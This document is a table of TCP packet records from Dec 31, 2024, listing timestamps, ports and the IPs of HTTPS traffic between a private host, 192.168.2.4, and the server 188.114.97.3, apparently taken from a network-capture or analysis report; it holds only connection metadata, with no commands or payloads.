Dec 31, 2024 08:57:17.752305984 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.752305984 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.752311945 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.752666950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.752681017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.752712011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.752717018 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.752751112 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.779186964 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.779205084 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.779251099 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.779263020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.779278994 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.779709101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.779721022 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.779772997 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.779781103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.780344963 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.780361891 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.780416965 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.780421972 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.805630922 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.805644035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.805722952 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.805728912 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.839227915 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.839247942 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.839281082 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.839287043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.839309931 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.839910984 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.839925051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.839968920 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.839975119 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.840630054 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.840646982 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.840692997 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.840698957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.840718985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.841131926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.841144085 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.841176033 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.841181040 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.841201067 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.865994930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866012096 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866044998 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.866051912 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866105080 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.866420031 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866430998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866471052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.866476059 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866501093 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.866974115 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.866988897 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.867022038 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.867029905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.867065907 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.893656015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.893676043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.893708944 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.893713951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.893748999 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.924992085 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.925019026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.925041914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.925048113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.925090075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.925486088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.925503969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.925530910 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.925535917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.925561905 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.926012039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.926047087 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.926057100 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.926069021 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.926099062 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.926469088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.926487923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.926546097 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.926547050 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.926551104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.952841043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.952856064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.952917099 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.952922106 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953247070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953262091 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953288078 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.953294039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953311920 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.953723907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953736067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953777075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.953782082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.953799009 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.979331017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.979348898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.979372978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:17.979382992 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:17.979445934 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.011795998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.011811018 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.011878967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.011884928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.011905909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.012346983 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.012363911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.012391090 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.012401104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.012422085 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.012953997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.012968063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.012999058 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.013005018 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.013037920 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.013297081 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.013314962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.013338089 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.013344049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.013390064 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.039659023 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.039673090 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.039701939 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.039709091 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.039783955 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.040112972 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.040127039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.040193081 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.040198088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.040616035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.040637016 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.040663958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.040672064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.040693045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.067452908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.067466974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.067579031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.067584038 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.098752975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.098769903 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.098941088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.098947048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.099230051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.099242926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.099335909 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.099343061 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.099700928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.099719048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.099797964 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.099797964 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.099803925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.100156069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.100167990 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.100466967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.100472927 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.126430988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.126451015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.126527071 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.126534939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.126589060 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.126811981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.126826048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.126962900 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.126966953 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.127290964 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.127307892 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.127343893 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.127350092 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.127408028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.154109955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.154134035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.154267073 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.154267073 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.154274940 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.185503006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.185522079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.185621977 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.185621977 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.185633898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.186078072 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.186091900 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.186160088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.186160088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.186166048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.186527014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.186544895 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.186727047 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.186732054 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.187032938 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.187045097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.187107086 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.187112093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.187189102 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.213435888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.213454962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.213506937 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.213536978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.213545084 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.213577032 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:18.213597059 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.213655949 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:18.224677086 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:24.602082968 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:24.602111101 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:24.602171898 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:24.602936983 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:24.602947950 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.090046883 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.090128899 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.091687918 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.091697931 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.091922045 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.132286072 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.132318974 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.132360935 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.555565119 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.555656910 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.555704117 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.587766886 CET	49889	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.587789059 CET	443	49889	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.604943991 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.604976892 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:25.605036974 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.605410099 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:25.605421066 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.061939001 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.062021971 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.063076019 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.063086033 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.063328028 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.064723969 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.064723969 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.064790964 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390433073 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390499115 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390532017 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390566111 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390592098 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.390599012 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390608072 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.390638113 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.390638113 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.390647888 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.391159058 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.391232967 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.391237974 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.391660929 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.391733885 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.391740084 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.438206911 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.438218117 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477349997 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477427959 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.477435112 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477528095 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477588892 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477641106 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.477646112 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477689028 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477691889 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.477777004 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.477842093 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.477852106 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.477875948 CET	49897	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.477880955 CET	443	49897	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.592297077 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.592339993 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:26.592586040 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.592945099 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:26.592957020 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.075684071 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.075762033 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.076776028 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.076781988 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.076992035 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.079715014 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.079828024 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.079844952 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.080086946 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.080094099 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.764127016 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.764225960 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.764292955 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.764391899 CET	49904	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.764410973 CET	443	49904	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.852030993 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.852067947 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:27.852145910 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.852356911 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:27.852372885 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.329354048 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.329423904 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:28.330779076 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:28.330786943 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.331027031 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.332212925 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:28.332312107 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:28.332344055 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.906205893 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.906325102 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:28.906383991 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:28.906521082 CET	49913	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:28.906536102 CET	443	49913	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.085772991 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.085793018 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.085913897 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.086370945 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.086380959 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.569900990 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.569973946 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.573045015 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.573059082 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.573314905 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.574490070 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.574584007 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.574620962 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:29.574716091 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:29.574726105 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.186403990 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.186513901 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.186566114 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.186707020 CET	49919	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.186722040 CET	443	49919	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.524728060 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.524765968 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.524857044 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.525109053 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.525124073 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.989263058 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.989336014 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.990494013 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.990502119 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.990734100 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:30.991750002 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.991847038 CET	49928	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:58:30.991852999 CET	443	49928	188.114.97.3	192.168.2.4
Dec 31, 2024 08:58:31.440788984 CET	443	49928	188.114.97.3	192.168.2.4
